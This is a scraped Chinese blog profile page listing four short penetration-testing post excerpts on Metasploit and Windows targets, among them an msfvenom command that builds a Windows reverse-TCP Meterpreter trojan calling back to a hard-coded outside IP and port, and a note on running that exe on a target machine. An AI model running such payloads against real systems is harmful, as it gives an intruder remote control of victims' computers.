自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4)
  • 收藏
  • 关注

原创 windows使用命令执行exe文件

很多时候我们需要在目标windows的机器上执行exe文件获取meterpreter,这个时候只需要执行一条简单的命令进入木马的文件夹,执行 start+空格+xxx.exe

2018-11-12 11:26:06 23079

原创 msf拿到windows的shell显示乱码解决方法

0x01:渗透的时候拿到一台windows7的权限,但使用msf显示乱码,很不舒服 0x02:使用   chcp 65001 这条语句即可解决

2018-11-02 15:28:52 13510 7

原创 Metasploit常用操作

payload的几个常用生成 1、生成windows下的反弹木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe-p=payload -f format -o path 2、监听use exploit/multi/handler...

2018-11-02 15:05:25 586 1

原创 github平台上的安全工具集

参考:https://www.cnblogs.com/hookjoy/p/9380345.html参考:https://github.com/We5ter/Scanners-Box

2018-11-02 10:40:32 453

网络安全攻防+web常见系统收集关键字

这个资源是一份非常实用的参考资料,特别为有志于网络安全领域从事渗透测试、网络安全评估和漏洞挖掘等工作的学习者准备。该资源包含了常见的Web系统,如CMS、框架和核心,在进行渗透测试时使用的常见关键词,如漏洞名称、文件名、参数、语句、脚本等等。 使用“web常见系统收集关键字”资源,您可以更加高效地进行渗透测试和漏洞挖掘,减少不必要的盲目尝试,提高安全测试的效果。 这个资源已经被广大安全从业者和学习者所使用,得到了良好的反馈。如果您也希望在网络安全领域有所建树,那么不要犹豫,来试试这份参考资料吧!

2023-06-23

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除